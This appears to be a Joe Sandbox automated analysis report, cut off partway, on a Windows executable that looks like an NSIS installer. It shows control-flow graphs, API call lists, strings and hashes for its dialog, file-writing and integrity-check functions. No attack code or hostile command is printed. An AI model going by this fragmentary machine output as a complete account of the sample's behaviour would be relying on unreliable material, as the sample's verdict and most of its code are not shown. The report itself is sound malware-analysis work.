                                                                                                control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                APIs
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                • ShowWindow.USER32(?), ref: 004054FE
                                                                                                • DestroyWindow.USER32 ref: 00405512
                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 3282139019-0
                                                                                                • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                APIs
                                                                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                  • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                • API String ID: 608394941-2746725676
                                                                                                • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                • lstrcatW.KERNEL32(00000000,00000000,232,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                • CompareFileTime.KERNEL32(-00000014,?,232,232,00000000,00000000,232,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004255E0,771B23A0,00000000), ref: 00404FD6
                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004255E0,771B23A0,00000000), ref: 00404FE6
                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004255E0,771B23A0,00000000), ref: 00404FF9
                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                • String ID: 232$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                • API String ID: 4286501637-2656113216
                                                                                                • Opcode ID: 64a557673ae3d0e019bdca1bc4e77ebfe7370d638d91dc23aa74aa5952768e1c
                                                                                                • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                • Opcode Fuzzy Hash: 64a557673ae3d0e019bdca1bc4e77ebfe7370d638d91dc23aa74aa5952768e1c
                                                                                                • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                Strings
                                                                                                • soft, xrefs: 004036A1
                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                • Inst, xrefs: 00403698
                                                                                                • Null, xrefs: 004036AA
                                                                                                • Error launching installer, xrefs: 00403603
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                • API String ID: 4283519449-527102705
                                                                                                • Opcode ID: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                • Opcode Fuzzy Hash: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175fileCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                • GetTickCount.KERNEL32 ref: 00403492
                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                • wsprintfW.USER32 ref: 004034CE
                                                                                                • WriteFile.KERNELBASE(00000000,00000000,004255E0,00403792,00000000), ref: 004034FF
                                                                                                • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: CountFileTickWrite$wsprintf
                                                                                                • String ID: (]C$... %d%%$pAB$UB
                                                                                                • API String ID: 651206458-3730494346
                                                                                                • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(00445D80,004255E0,771B23A0,00000000), ref: 00404FD6
                                                                                                • lstrlenW.KERNEL32(004034E5,00445D80,004255E0,771B23A0,00000000), ref: 00404FE6
                                                                                                • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004255E0,771B23A0,00000000), ref: 00404FF9
                                                                                                • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004255E0,771B23A0,00000000), ref: 00406902
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                • String ID:
                                                                                                • API String ID: 2740478559-0
                                                                                                • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f69 GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 745 401f6e-401f7b 732->745 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 751 402387-40238d GlobalFree 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 750 4030e3-4030f2 742->750 745->750 745->751 762 402708-40270e 747->762 751->750 762->750
                                                                                                APIs
                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                • GlobalFree.KERNEL32(006B0240), ref: 00402387
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
